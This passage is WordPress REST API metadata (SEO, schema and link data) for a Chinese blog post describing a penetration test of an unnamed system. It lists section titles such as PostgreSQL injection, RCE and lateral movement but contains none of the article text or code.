:\"\u9996\u9875\",\"item\":\"https:\/\/mnihyc.com\/blog\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\",\"url\":\"https:\/\/mnihyc.com\/blog\/\",\"name\":\"mnihyc&#039;s Blog\",\"description\":\"Welcome!\",\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/mnihyc.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\",\"name\":\"mnihyc\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"caption\":\"mnihyc\"},\"logo\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog","description":"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/0.mnihyc.com\/blog\/archives\/1757","og_locale":"zh_CN","og_type":"article","og_title":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog","og_description":"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def","og_url":"https:\/\/0.mnihyc.com\/blog\/archives\/1757","og_site_name":"mnihyc&#039;s Blog","article_published_time":"2023-09-01T16:16:38+00:00","article_modified_time":"2023-09-23T10:52:24+00:00","og_image":[{"url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png","type":"","width":"","height":""}],"author":"mnihyc","twitter_card":"summary_large_image","twitter_creator":"@mnihyc","twitter_site":"@mnihyc","twitter_misc":{"\u4f5c\u8005":"mnihyc","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"8 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#article","isPartOf":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757"},"author":{"name":"mnihyc","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"headline":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5","datePublished":"2023-09-01T16:16:38+00:00","dateModified":"2023-09-23T10:52:24+00:00","mainEntityOfPage":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757"},"wordCount":516,"commentCount":0,"publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"image":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png","articleSection":["Web"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/0.mnihyc.com\/blog\/archives\/1757#respond"]}]},{"@type":"WebPage","@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757","url":"https:\/\/0.mnihyc.com\/blog\/archives\/1757","name":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage"},"image":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png","datePublished":"2023-09-01T16:16:38+00:00","dateModified":"2023-09-23T10:52:24+00:00","description":"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def","breadcrumb":{"@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/0.mnihyc.com\/blog\/archives\/1757"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage","url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png","contentUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png"},{"@type":"BreadcrumbList","@id":"https:\/\/0.mnihyc.com\/blog\/archives\/1757#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/mnihyc.com\/blog"},{"@type":"ListItem","position":2,"name":"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5"}]},{"@type":"WebSite","@id":"https:\/\/mnihyc.com\/blog\/#website","url":"https:\/\/mnihyc.com\/blog\/","name":"mnihyc&#039;s Blog","description":"Welcome!","publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/mnihyc.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751","name":"mnihyc","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","caption":"mnihyc"},"logo":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1757","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/comments?post=1757"}],"version-history":[{"count":35,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1757\/revisions"}],"predecessor-version":[{"id":1808,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1757\/revisions\/1808"}],"wp:attachment":[{"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/media?parent=1757"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/categories?post=1757"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0.mnihyc.com\/blog\/wp-json\/wp\/v2\/tags?post=1757"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}